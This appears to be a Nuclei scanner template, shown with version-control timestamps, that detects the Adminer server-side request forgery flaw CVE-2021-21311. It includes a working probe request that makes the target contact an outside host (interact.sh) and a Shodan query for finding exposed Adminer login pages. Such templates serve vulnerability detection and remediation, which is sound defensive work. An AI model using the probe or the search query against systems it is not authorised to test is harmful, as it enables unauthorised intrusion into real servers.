2022-03-31 19:40:06 +00:00
id : CVE-2021-21311
info :
2022-06-27 17:12:31 +00:00
name : Adminer <4.7.9 - Server-Side Request Forgery
2022-03-31 19:40:06 +00:00
author : Adam Crosser
severity : high
2022-06-27 17:19:33 +00:00
description : Adminer from version 4.0.0 through 4.7.8 is susceptible to server-side request forgery due to its use of verbose error messages. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected.
2022-03-31 19:40:06 +00:00
reference :
- https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
- https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
2022-05-17 09:18:12 +00:00
- https://packagist.org/packages/vrana/adminer
2022-06-27 17:12:31 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-21311
2022-03-31 19:40:33 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.2
2022-03-31 19:40:33 +00:00
cve-id : CVE-2021-21311
cwe-id : CWE-918
2022-06-27 17:12:31 +00:00
remediation : Upgrade to version 4.7.9 or later.
2022-04-22 10:38:41 +00:00
metadata :
shodan-query : title:"Login - Adminer"
tags : cve,cve2021,adminer,ssrf
2022-03-31 19:40:06 +00:00
requests :
- method : GET
path :
2022-06-06 10:40:15 +00:00
- "{{BaseURL}}/adminer?elastic=interact.sh&username="
2022-03-31 19:40:06 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 403
- type : word
part : body
words :
2022-06-27 17:12:31 +00:00
- "<title>400 - Bad Request</title>"
# Enhanced by mp on 2022/06/27